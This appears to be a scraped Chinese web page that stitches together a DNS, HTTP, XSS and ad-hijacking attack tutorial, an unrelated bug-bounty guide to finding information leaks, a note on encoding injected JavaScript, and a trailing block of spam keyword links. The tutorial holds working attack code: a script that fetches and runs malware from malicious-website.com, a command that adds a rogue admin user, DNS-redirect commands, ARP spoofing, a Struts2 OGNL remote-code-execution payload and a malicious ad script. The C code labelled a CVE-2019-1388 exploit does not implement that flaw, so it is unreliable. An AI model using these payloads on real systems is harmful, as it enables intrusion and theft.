整合營銷服務(wù)商

          電腦端+手機端+微信端=數(shù)據(jù)同步管理

          免費咨詢熱線:

          關(guān)于DNS劫持、HTTP劫持、內(nèi)容注入和廣告劫持的詳

          關(guān)于DNS劫持、HTTP劫持、內(nèi)容注入和廣告劫持的詳細分析-實戰(zhàn)篇

          供學(xué)習(xí)研究交流使用,切勿用于違法犯罪,為維護網(wǎng)絡(luò)安全做貢獻!

          一、DNS劫持

          1. 修改本地DNS設(shè)置

          步驟一:物理訪問或惡意軟件感染

          惡意軟件感染

          • 攻擊者通過釣魚郵件或惡意網(wǎng)站誘導(dǎo)用戶下載并運行惡意軟件。

          python

          復(fù)制代碼

          # 示例Python代碼,惡意軟件偽裝成合法軟件 import os def download_payload(): # 下載惡意軟件 os.system("curl -O http://malicious-website.com/malware.exe") def execute_payload(): # 執(zhí)行下載的惡意軟件 os.system("malware.exe") download_payload() execute_payload()

          步驟二:獲取管理員權(quán)限

          提權(quán)方法

          • 惡意軟件利用系統(tǒng)漏洞提升權(quán)限,例如通過Windows UAC繞過或使用已知的提權(quán)漏洞。

          示例漏洞:CVE-2019-1388

          • CVE-2019-1388是一個Windows UAC繞過漏洞,攻擊者可以通過偽造的簽名窗口提升權(quán)限。

          利用示例

          1. 創(chuàng)建惡意文件

          c

          復(fù)制代碼

          // Exploit.c: 利用CVE-2019-1388的UAC繞過漏洞 #include <windows.h> #include <stdio.h> int main() { SHELLEXECUTEINFO shExecInfo; shExecInfo.cbSize=sizeof(SHELLEXECUTEINFO); shExecInfo.fMask=SEE_MASK_NOCLOSEPROCESS; shExecInfo.hwnd=NULL; shExecInfo.lpVerb="runas"; // 請求管理員權(quán)限 shExecInfo.lpFile="cmd.exe"; // 要運行的程序 shExecInfo.lpParameters="/c net user hacker Password123! /add"; // 創(chuàng)建新用戶 shExecInfo.lpDirectory=NULL; shExecInfo.nShow=SW_SHOWNORMAL; shExecInfo.hInstApp=NULL; ShellExecuteEx(&shExecInfo); WaitForSingleObject(shExecInfo.hProcess, INFINITE); CloseHandle(shExecInfo.hProcess); return 0; }

          1. 編譯并運行惡意文件

          shell

          復(fù)制代碼

          gcc Exploit.c -o Exploit.exe Exploit.exe

          步驟三:修改DNS設(shè)置

          使用命令提示符

          shell

          復(fù)制代碼

          # 修改DNS設(shè)置,將DNS服務(wù)器地址更改為攻擊者控制的DNS服務(wù)器 netsh interface ip set dns name="Local Area Connection" static 203.0.113.5

          修改注冊表

          shell

          復(fù)制代碼

          # 示例命令,修改注冊表中的DNS設(shè)置 reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{interface-ID}" /v NameServer /t REG_SZ /d 203.0.113.5 /f

          步驟四:DNS解析劫持

          • 當(dāng)用戶訪問合法域名時,DNS請求被發(fā)送到攻擊者控制的DNS服務(wù)器,返回偽造的IP地址,重定向用戶到惡意網(wǎng)站。

          2. 攻擊DNS服務(wù)器

          步驟一:識別目標(biāo)DNS服務(wù)器

          • 使用工具如nslookup、whois或dig來識別DNS服務(wù)器的IP地址和相關(guān)信息。

          shell

          復(fù)制代碼

          # 使用nslookup識別DNS服務(wù)器 nslookup example.com

          步驟二:漏洞利用或暴力破解

          • 利用DNS服務(wù)器軟件的已知漏洞,例如BIND DNS服務(wù)器中的漏洞CVE-2020-8617,或通過暴力破解獲取管理員權(quán)限。

          shell

          復(fù)制代碼

          # 使用Metasploit框架利用BIND DNS漏洞 use exploit/linux/misc/bind_tkey set RHOSTS <target_ip> set LHOST <your_ip> exploit

          步驟三:篡改DNS解析記錄

          • 登錄DNS服務(wù)器的管理界面,修改DNS解析記錄,將合法域名解析為惡意IP地址。

          shell

          復(fù)制代碼

          # 例如,在BIND DNS服務(wù)器中修改zone文件 vi /etc/bind/named.conf.local # 添加或修改解析記錄 zone "example.com" { type master; file "/etc/bind/db.example.com"; };

          步驟四:劫持用戶請求

          • 所有請求該DNS服務(wù)器解析域名的用戶都會被重定向到惡意網(wǎng)站。

          二、HTTP劫持

          中間人攻擊(MITM)

          步驟一:建立中間人位置

          ARP欺騙

          python

          復(fù)制代碼

          # 使用scapy庫進行ARP欺騙 from scapy.all import ARP, send def arp_poison(target_ip, target_mac, spoof_ip): arp_response=ARP(pdst=target_ip, hwdst=target_mac, psrc=spoof_ip, op='is-at') send(arp_response, verbose=0) # 示例:將目標(biāo)IP的網(wǎng)關(guān)MAC地址更改為攻擊者的MAC地址 arp_poison('192.168.1.10', '00:11:22:33:44:55', '192.168.1.1')

          步驟二:攔截HTTP請求

          捕獲HTTP流量

          shell

          復(fù)制代碼

          # 使用Wireshark或tcpdump捕獲HTTP流量 tcpdump -i eth0 -w capture.pcap 'tcp port 80'

          步驟三:篡改HTTP響應(yīng)

          使用Burp Suite攔截并修改HTTP響應(yīng)

          • 在Burp Suite中設(shè)置攔截規(guī)則,攔截HTTP響應(yīng)并插入惡意代碼。

          html

          復(fù)制代碼

          <!-- 插入惡意JavaScript代碼的示例 --> <script>alert('This site is hacked');</script>

          步驟四:執(zhí)行惡意代碼

          • 用戶瀏覽器接收并執(zhí)行篡改后的HTTP響應(yīng),執(zhí)行其中的惡意代碼。

          三、內(nèi)容注入

          XSS(跨站腳本)攻擊

          步驟一:發(fā)現(xiàn)注入點

          • 攻擊者在論壇、評論區(qū)或其他用戶輸入?yún)^(qū)域進行測試,尋找可以插入JavaScript代碼的注入點。

          步驟二:構(gòu)造惡意代碼

          html

          復(fù)制代碼

          <!-- 示例:構(gòu)造包含惡意JavaScript代碼的輸入 --> <script>alert('XSS');</script>

          步驟三:注入惡意代碼

          • 攻擊者將惡意代碼輸入到注入點,提交表單或發(fā)布評論。

          步驟四:執(zhí)行惡意代碼

          • 服務(wù)器未對輸入進行適當(dāng)過濾,直接返回包含惡意代碼的響應(yīng)。用戶瀏覽器執(zhí)行惡意代碼,攻擊者實現(xiàn)控制。

          四、廣告劫持

          劫持第三方廣告網(wǎng)絡(luò)

          步驟一:識別目標(biāo)廣告網(wǎng)絡(luò)

          • 攻擊者通過分析廣告腳本和網(wǎng)絡(luò)流量,確定廣告網(wǎng)絡(luò)的來源和結(jié)構(gòu)。

          javascript

          復(fù)制代碼

          // 分析廣告腳本 console.log(document.querySelectorAll('script[src*="adnetwork.com"]'));

          步驟二:漏洞利用或社會工程學(xué)

          • 利用廣告網(wǎng)絡(luò)的漏洞或通過社會工程學(xué)手段獲取廣告網(wǎng)絡(luò)管理權(quán)限。

          示例漏洞:CVE-2018-11776

          • 這是一個Apache Struts的遠程代碼執(zhí)行漏洞,攻擊者可以通過特定的輸入導(dǎo)致遠程代碼執(zhí)行。

          利用示例

          1. 創(chuàng)建惡意請求

          http

          復(fù)制代碼

          POST /struts2-rest-showcase/orders HTTP/1.1 Host: target.com Content-Type: application/x-www-form-urlencoded Content-Length: 100 %{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess=#dm).(#cmd='id').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/sh','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}

          1. 發(fā)送惡意請求
          • 使用工具如curl或Burp Suite發(fā)送惡意請求,觸發(fā)漏洞。

          步驟三:替換廣告內(nèi)容

          • 攻擊者登錄廣告網(wǎng)絡(luò)管理界面,將合法廣告替換為惡意廣告,內(nèi)容包括惡意JavaScript代碼或重定向鏈接。

          html

          復(fù)制代碼

          <!-- 替換廣告內(nèi)容為惡意廣告 --> <script src="http://malicious-website.com/malicious.js"></script>

          步驟四:加載惡意廣告

          • 用戶瀏覽包含被劫持廣告的網(wǎng)頁時,惡意廣告加載并執(zhí)行,其中的惡意代碼或重定向鏈接開始運行。

          html

          復(fù)制代碼

          <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <title>Ad Page</title> </head> <body> <h1>Welcome to the Ad Page</h1> <!-- 惡意廣告加載 --> <script src="http://malicious-website.com/malicious.js"></script> </body> </html>

          結(jié)論

          通過詳細的步驟和代碼示例,我們可以更清楚地了解DNS劫持、HTTP劫持、內(nèi)容注入和廣告劫持的實現(xiàn)方式。這些攻擊手段對用戶和網(wǎng)絡(luò)安全構(gòu)成嚴重威脅,但通過了解其原理和實現(xiàn)細節(jié),我們可以采取更有效的防護措施,保護我們的網(wǎng)絡(luò)環(huán)境和數(shù)據(jù)安全。如果你有任何問題或想法,請在評論區(qū)分享,我們一起探討。

          家好,我是劍影,這是我的第五篇原創(chuàng)文章。1月已經(jīng)過半,很多童鞋應(yīng)該都放寒假了,那么挖掘漏洞的時間就比較多啦,在挖掘的過程中,思路的積累以及創(chuàng)新是尤為重要的。在寫這篇文章前,我實際上還沒想好該寫什么內(nèi)容,然后回顧了以往挖掘各大SRC漏洞的歷程,覺得寫關(guān)于信息泄露這方面的問題比較OK些,于是,我根據(jù)自己的挖掘思路和網(wǎng)上的思路做了一個總結(jié),希望能讓你們學(xué)有收獲。

          信息漏洞的危害涉及到企業(yè)和用戶,一直以來都是高風(fēng)險的問題,本文章就兩個方向進行講述挖掘信息泄露的那些思路。

          Web方面的信息泄露

          0x01 用戶信息泄露

          ①:評論處

          第一點:

          一般用戶評論處用戶的信息都是加密的,比如顯示的是用戶手機號或郵箱等,就會直接對中間的一段數(shù)字進行加密,但是有些可能就沒有加密,而是直接顯示出來,那么這就造成了用戶信息泄露問題。

          第二點:

          如果加密不當(dāng),直接游覽用戶評論處時進行抓包,然后查看返回包就可以直接看到明文,但有的時候會有2個參數(shù),就比如name:1333******1這個值是加密的,但后面還會有一個testname這個參數(shù)就沒有進行加密,從而導(dǎo)致用戶信息泄露。這里有一些小技巧,就比如一個買賣市場,他有用戶評論的地方,有一個秒殺搶購成功的展示用戶的地方,還有一個是用戶相互交流的地方,一般白帽子測試了第一個功能處發(fā)現(xiàn)不存在問題,然后就不繼續(xù)測試其它相同功能處了,這個疏忽就可能會導(dǎo)致錯過一個發(fā)現(xiàn)問題的機會,每個功能處,加密機制有時候就會被漏掉,就比如用戶評論處用戶信息加了密,但是秒殺搶購成功的展示用戶的地方卻沒有加密,所以白帽子要更細心點。

          第三點:

          一般評論處都會有一個追加評論功能和一個商家回復(fù)功能,那么此時如果對這個功能參數(shù)沒有加以加密,那么通過抓包游覽查看返回包就可看到追加評論的用戶信息和商家信息。

          第四點:

          有些評論功能當(dāng)中支持艾特(@)他人,那么在這個評論當(dāng)中你通過@他人,然后輸入信息點擊發(fā)送到評論處時,通關(guān)抓包就可看到剛剛@的那個用戶的明文信息。

          第五點:

          當(dāng)這個網(wǎng)站評論地方被搜索引擎爬蟲到了,那么可以嘗試利用搜索命令site:XXXX.com inurl:XX目錄在搜索引擎當(dāng)中搜索,如果加密不完全,那么就可以在搜索引擎當(dāng)中看到明文信息。關(guān)于這類的信息泄露問題我找到了相關(guān)例子:http://wooyun.jozxing.cc/static/bugs/wooyun-2015-0104766.html

          ②:轉(zhuǎn)賬處

          第一點:

          很多大型公司都有自家的金融平臺,然后在轉(zhuǎn)賬處,當(dāng)你輸入對方的轉(zhuǎn)賬的賬戶,比如手機號或者郵箱,然后當(dāng)你點擊其它地方,它會向服務(wù)器發(fā)送一條驗證信息,驗證輸入的此賬戶是否存在,如果存在,返回對應(yīng)的手機號或者郵箱賬戶的用戶姓名,比如*王(1333333XXX)這樣的返回信息,那么如果此時前端加密不當(dāng),可以通過抓包攔截這條請求,查看返回信息,就可看到明文的姓名。關(guān)于這類問題,我找到了相關(guān)例子:http://wooyun.jozxing.cc/static/bugs/wooyun-2015-0124969.html

          第二點:

          一般在轉(zhuǎn)賬處輸入手機號或郵箱賬戶的旁邊,有一個歷史轉(zhuǎn)賬信息,一個迷你的小頁面,當(dāng)你點擊后會看到之前轉(zhuǎn)賬成功的信息,但是,如果此頁面加密不全,那么在點擊查看歷史轉(zhuǎn)賬信息時直接抓包查看返回內(nèi)容就可看到明文的姓名。

          ③:搜索處

          第一點:

          有些平臺內(nèi)置了搜索功能,跟搜索引擎思路很像,同樣也是隨意搜索,如果此時搜索的結(jié)果包含用戶信息這塊,那么就可能會導(dǎo)致用戶信息泄露問題。關(guān)于這類問題,我找到了相關(guān)例子:http://wooyun.jozxing.cc/static/bugs/wooyun-2014-069909.html

          ④:個人頁面處

          第一點:

          在個人頁面當(dāng)中,直接游覽時直接抓包,查看返回包就可看到用戶信息是否未加密完全。比如一些金融APP,如果加密不當(dāng),當(dāng)點擊個人界面時通過抓包查看返回包就可看到明文的身份證信息和用戶名以及手機號。當(dāng)然這里不是只有涉及金融APP方面的才會有這個問題,只要是可以查看個人頁面處都可能存在。

          第二點:

          在查看銀行卡信息那里,一般都是加了密的,但查看銀行卡信息處時進行抓包查看返回包的時候就可看到明文的銀行卡卡號信息和姓名信息。

          ⑤:客服處

          第一點:

          這個問題屬于客服安全方面意思不足,大一點的來看就是公司沒有對客服進行安全培訓(xùn)等,當(dāng)你詢問客服某手機號對應(yīng)的姓名時,客服就會直接把姓名發(fā)你,當(dāng)然這要考驗?zāi)闶窃趺磫柕牧耍€有如果失敗了不要放棄,換一個客服繼續(xù)測試。

          越權(quán)方面的用戶信息泄露

          ①:任意查看

          第一點:

          很多平臺需要進行實名制認證,在上傳實名制所需要的身份證照片等信息圖片時,如果沒有對所產(chǎn)生的文件名格式進行復(fù)雜化的話,那么極有可能會存在任意查看,通過批量的方式就可以進行這些步驟,比如你上傳了圖片,服務(wù)器生成的圖片地址是XXX.com/xxx/xx/012313.jpg這樣短的數(shù)字格式文件名的話,就會存在該問題。

          第二點:

          購物平臺當(dāng)中,在添加地址或修改地址的地方,如果權(quán)限沒過濾好,就可以越權(quán)進行查看任意用戶的地址信息。

          第三點:

          在某些平臺當(dāng)中,支持添加子賬戶,然后隨便添加一個子賬戶,然后在查看該子賬戶的時候進行抓包,修改其ID值,就可以查看任意賬戶信息

          第四點:

          有些平臺有操作日志或其它日志功能,那么如果此時對當(dāng)前用戶的權(quán)限過濾不當(dāng),那么就可以查看全部用戶操作時產(chǎn)生的日志,從而導(dǎo)致信息泄露。

          第五點:

          在很多金融平臺當(dāng)中,在修改昵稱那里或者查看個人信息那里,提交時抓包,修改其用戶值為存在用戶的任意值,那么就可能造成查看任意用戶信息的問題。

          第六點:

          如果你進入了一些內(nèi)部員工平臺,那么如果具有搜索功能,就比如你輸入了員工工號然后它會返回這個員工的所有在職信息,那么此時你可以通過抓包批量進行提交員工工號,就可造成大范圍的信息泄露。

          第七點:

          隨便買一個東西生成訂單,如果此時權(quán)限控制不當(dāng),就可以越權(quán)查看到任意用戶的訂單,那么信息也自認而然的泄露出來了。關(guān)于這方面,我找到了相關(guān)例子:http://wooyun.jozxing.cc/static/bugs/wooyun-2014-083157.html

          ②:任意重置

          第一點:

          如果權(quán)限控制不當(dāng),可導(dǎo)致任意用戶密碼修改的話,那么登錄后就可查看該用戶的任意信息,這也就導(dǎo)致了用戶信息泄露。

          ③:任意修改

          第一點:

          在下單的時候修改其用戶ID為任意存在用戶的ID,然后下單,然后查看剛剛下單的信息,就可看到該用戶的收貨地址信息,只要對方設(shè)置了收貨地址。接口方面的用戶信息泄露

          第一點:

          很多業(yè)務(wù)網(wǎng)站在上線的時候都忘記把測試時的接口進行關(guān)閉,從而導(dǎo)致這個接口可以查詢大量用戶信息。那么此類接口怎么找呢?其中之一的方法通過Github.com網(wǎng)站進行搜索相關(guān)域名進行查找。關(guān)于這類問題,我找到了相關(guān)例子:http://wooyun.jozxing.cc/static/bugs/wooyun-2015-0116563.html注入方面的用戶信息泄露

          第一點:

          注入可以說是非常非常的嚴重,因為注入往往都能得到很多信息,如果沒做好相關(guān)過濾以及防護,就可導(dǎo)致注入,從而數(shù)據(jù)庫內(nèi)的各種數(shù)據(jù)面對裸露的危險。

          以上就是關(guān)于挖掘用戶信息泄露方向的思路了,我試著努力回想,但目前只能總結(jié)到這幾個點,如果還有更多思路,歡迎在評論處留言!

          0x02 服務(wù)器路徑信息泄露

          ①:上傳圖片處

          第一點:

          在上傳圖片處,這里我說下最可能存在問題的點,就是關(guān)于上傳相關(guān)證明,進行實名制上傳信息等功能頁面,在上傳圖片時進行抓包,然后查看返回包,那么就可看到當(dāng)前服務(wù)器的絕對路徑信息。

          ②:XML處

          第一點:

          一些XML限制或刪除不完全,可導(dǎo)致服務(wù)器等信息泄露。詳細例子:http://wooyun.jozxing.cc/static/bugs/wooyun-2015-0123762.html

          ③:第三方的服務(wù)當(dāng)中

          第一點:

          很多,如:Apache Tomcat、Struts2、CMS、zabix、Nginx等等,例如Nginx的某版本解析漏洞,就可造成路徑信息泄露。關(guān)于這方面我找到了相關(guān)例子:http://wooyun.jozxing.cc/static/bugs/wooyun-2013-019253.htmlhttp://wooyun.jozxing.cc/static/bugs/wooyun-2012-04655.html

          ④:利用報錯問題

          第一點:

          在處理報錯信息的問題上如果處理不當(dāng),就可導(dǎo)致路徑信息泄露,比如訪問一些不存在的文件等思路。這里我找到了相關(guān)例子:http://wooyun.jozxing.cc/static/bugs/wooyun-2012-010115.htmlhttp://wooyun.jozxing.cc/static/bugs/wooyun-2011-02219.htmlhttp://wooyun.jozxing.cc/static/bugs/wooyun-2012-09901.html

          以上就是關(guān)于服務(wù)器路徑信息泄露問題!

          0x03 員工信息泄露

          ①:各第三方平臺當(dāng)中

          第一點:

          Github,很不錯的開源社區(qū)平臺。一些員工喜歡將自己的信息上傳到這平臺上,但是往往忽視了安全,有時這上傳的代碼當(dāng)中就可能包含很多內(nèi)部測試員工的賬戶以及密碼信息等。關(guān)于這方面我找到了相關(guān)例子:http://wooyun.jozxing.cc/static/bugs/wooyun-2016-0177720.htmlhttp://wooyun.jozxing.cc/static/bugs/wooyun-2015-0164337.html

          第二點:

          在搜索QQ群那里,通過搜索企業(yè)昵稱,往往都可以搜索出來關(guān)于企業(yè)員工或企業(yè)方面的信息,一般都會貼在公告當(dāng)中,比如某某測試賬戶等。當(dāng)然,你也可以申請加入群進行查看群文件,看是否有銘感的信息。這里我找到了相關(guān)例子:http://wooyun.jozxing.cc/static/bugs/wooyun-2015-0128511.htmlhttp://wooyun.jozxing.cc/static/bugs/wooyun-2015-093927.htmlhttp://wooyun.jozxing.cc/static/bugs/wooyun-2016-0208105.html

          第三點:

          百度貼吧當(dāng)中,一般都有公司員工創(chuàng)建的貼吧,如果安全意思不足,那么就會泄露相關(guān)員工工號,可用作暴力破解的字典。

          ②:弱密碼問題

          第一點:

          在一些涉及內(nèi)部員工方面的系統(tǒng),如果員工密碼為弱密碼,那么就可通過暴力破解方式進行嘗試登錄,如果成功爆破到了員工賬戶,那么一般只要是內(nèi)部員工系統(tǒng)該賬戶都可以登錄,那么所造成的影響也是很大的。

          以上就是關(guān)于員工信息泄露的問題!

          0x04 數(shù)據(jù)庫信息以及服務(wù)器信息泄露

          ①:各第三方平臺當(dāng)中

          第一點:

          Github,一些員工如果安全意識不足,同樣上傳的代碼當(dāng)中就包含了數(shù)據(jù)庫連接信息以及服務(wù)器信息。關(guān)于這類問題,我找到了相關(guān)例子:http://wooyun.jozxing.cc/static/bugs/wooyun-2016-0180848.html

          第二點:

          利用搜索QQ群的思路,如果員工的安全意識不足,那么數(shù)據(jù)庫連接信息以及服務(wù)器信息就會在公告或群文件當(dāng)中

          ②:XML處

          第一點:

          同樣在XML文件當(dāng)中,也可能會發(fā)現(xiàn)數(shù)據(jù)庫連接信息以及服務(wù)器信息。

          ③:svn處

          第一點:

          svn是一個開放源代碼的版本控制系統(tǒng),如果沒有加以限制或者刪除,那么就可以游覽相關(guān)的比較隱蔽性的源碼。關(guān)于這類的問題,我找到了相關(guān)例子:http://wooyun.jozxing.cc/static/bugs/wooyun-2016-0199607.htmlhttp://wooyun.jozxing.cc/static/bugs/wooyun-2016-0191202.html

          ③:數(shù)據(jù)庫文件

          第一點:

          一些數(shù)據(jù)庫相關(guān)文件如果刪除不當(dāng)或者擺放位置不當(dāng),那么極有可能被下載下來,造成危害。關(guān)于這方面,我找到了相關(guān)例子:http://wooyun.jozxing.cc/static/bugs/wooyun-2015-0158556.html

          ④:其它文件

          第一點:

          比如其它類型的文件,如Txt、Doc、Excel等文件,如果包含銘感信息,那么危害也是顯而易見的。以上就是關(guān)于數(shù)據(jù)庫信息以及服務(wù)器信息泄露的問題!

          APP方面的信息泄露

          0x01 敏感域名泄露

          ①:本地文件當(dāng)中

          第一點:

          一些比較隱私性的域名可能會包含在APP本地文件當(dāng)中,比如某內(nèi)部員工登錄系統(tǒng)的APP,但是由于有證書校驗,你也抓不到數(shù)據(jù)包,此時你可以查看該APP的本地文件,然后就可看到本APP內(nèi)調(diào)用的是哪些域名,然后還有相關(guān)的域名。從APP內(nèi)提取域名的相關(guān)程序很多,Github很多,這里我提供一個某作者寫的Windows下的工具吧,需要Net環(huán)境哦,下載地址:https://pan.baidu.com/s/1slJaYnF

          0x02 密碼泄露

          第一點:

          手勢密碼也存在在本地文件當(dāng)中,如果沒最好相關(guān)校驗或加密,那么手勢密碼就可能會泄露并且被利用。

          第二點:

          一些APP問題就是把用戶登錄的信息保存在本地,而且賬戶密碼都是以明文保存在本地文件或本地Sqlite數(shù)據(jù)庫當(dāng)中,很容易被利用。這里我找到了類似的例子:http://wooyun.jozxing.cc/static/bugs/wooyun-2011-02915.html

          第三點:

          同樣,一些APP也會把登錄成功的Cookie保存在本地,那么只要找到相關(guān)文件復(fù)制下來這個Cookie,就可以任意登錄了。

          當(dāng)然,訪問這些文件是需要ROOT權(quán)限的,以上就是APP方面的信息泄露問題了!

          總結(jié):

          信息泄露不管是泄露哪方面的,都需要重視,信息一直伴隨著每個人到終身,如何才能保證在這個過程當(dāng)中不被泄露和利用,那么就需要各位白帽子來維護以及廠商來重視,讓信息化的今天,更安全。感謝那些支持我的朋友們,你們的一點點支持對我來說都有著莫大的鼓勵。最后,發(fā)現(xiàn)問題,解決問題,讓世界更美,下次文章見~

          登錄安全客 - 有思想的安全新媒體www.anquanke.com/,或下載安全客APP來獲取更多最新資訊吧~

          景說明

          假設(shè)需要劫持http響應(yīng)并在html頁面中注入一段js代碼后再傳回瀏覽器,實現(xiàn)在瀏覽器出現(xiàn)一個彈框消息提醒。

          由于原始html頁面編碼格式存在UTF-8、GBK等多種編碼格式,如果注入的js包含中文消息的話,那么在UTF-8或GBK編碼的頁面就會有一個出現(xiàn)亂碼。有沒有辦法做到不管是針對GBK、UTF-8編碼的頁面都能做到正常顯示而不會出現(xiàn)亂碼哪?

          產(chǎn)生亂碼的原因

          首先來分析一下產(chǎn)生亂碼的原因,我們在瀏覽器看到的信息都是通過圖形學(xué)手段在顯示器上呈現(xiàn)出來的,而實際保存在計算機硬件上的都是0和1(因為計算機實現(xiàn)是基于二進制),那么計算機要顯示、傳遞信息就需要依靠一套規(guī)則把一串串的0和1識別為正確的字符,這就是編碼。

          例如01000001在ASCII編碼規(guī)則下對應(yīng)字母A。相同的0/1串,不同的編碼解析出的字符一般是不同的,因此如果html頁面按照UTF-8的編碼解析正常,那么按照GBK的編碼解析就會是亂碼了。根據(jù)上面的示意圖,假設(shè)注入的js代碼為utf-8編碼格式,而原始html編碼格式也為UTF-8編碼格式,那么最終注入這部分中的中文就能正常顯示,但是如果原始html為GBK編碼,那注入的這部分js代碼的中文就會顯示亂碼。

          解決辦法

          有一種unicode統(tǒng)一編碼字符集,目標(biāo)是把所有文字、字符統(tǒng)一編碼,也就是一串0/1組合在unicode字符集下對應(yīng)的字符是唯一的,不會存在歧義。而js是支持解析unicode字符的,那么就可以在注入js中把要顯示的消息統(tǒng)一轉(zhuǎn)換為unicode編碼,瀏覽器端去解析這個unicode編碼,這樣不管原始html是UTF-8還是GBK,都能正常顯示中文。

          原始注入js代碼關(guān)于中文字符的部分

          // utf-8編碼格式
          let message="中文";

          解決亂碼的注入js代碼關(guān)于中文字符的部分

          // utf-8編碼格式
          let message="\\u4e2d\\u6587";  // 這個編碼對應(yīng)上面的message"中文"

          注意:

          1. 注入的js代碼仍然是utf-8編碼格式,只是消息內(nèi)容轉(zhuǎn)換為unicode編碼的形式;
          2. unicode中0x4e2d表示的0/1串對應(yīng)漢字"中",0x6587對應(yīng)的0/1串對應(yīng)漢字"文";
          3. message其實也不是真正的unicode編碼,它只是普通的字符串,只是使用了unicode對應(yīng)的碼點(也就是二進制對應(yīng)的數(shù)值),因為可以利用這個碼點在瀏覽器中恢復(fù)出正確的字符,事實上unicode字符集并沒有規(guī)定具體的編碼格式。

          主站蜘蛛池模板: 国产一区二区精品久久91| 人妻AV中文字幕一区二区三区 | 一色一伦一区二区三区 | 亚洲av无码一区二区三区天堂古代| 成人国内精品久久久久一区| 亚洲永久无码3D动漫一区| 色偷偷av一区二区三区| 精品国产一区二区三区不卡| 国产成人高清亚洲一区久久| 国产精品一区在线观看你懂的| 久久国产精品最新一区| 精品无码人妻一区二区三区18 | 国产在线观看一区精品| 人妻AV一区二区三区精品 | 99久久精品国产高清一区二区| 一区二区三区四区免费视频| 欧美人妻一区黄a片| 国产一区二区精品久久岳| 色老头在线一区二区三区| 国产传媒一区二区三区呀| 国产精品日本一区二区不卡视频| 中文字幕人妻第一区| 精品国产一区二区22| 中文字幕一区在线观看视频| 久久免费视频一区| 无码人妻av一区二区三区蜜臀| 国产一区二区三区在线影院| 无码中文字幕乱码一区| 精品久久一区二区三区| 国产一区二区三区手机在线观看| 久久久久99人妻一区二区三区| 国产一区二区精品在线观看| av无码免费一区二区三区| 中文字幕一区二区日产乱码| 国产乱码精品一区二区三区香蕉 | 成人午夜视频精品一区| 亚洲AV无码一区二区三区性色 | 日韩精品午夜视频一区二区三区| 亚欧色一区W666天堂| 手机福利视频一区二区 | 国产乱码精品一区二区三区麻豆 |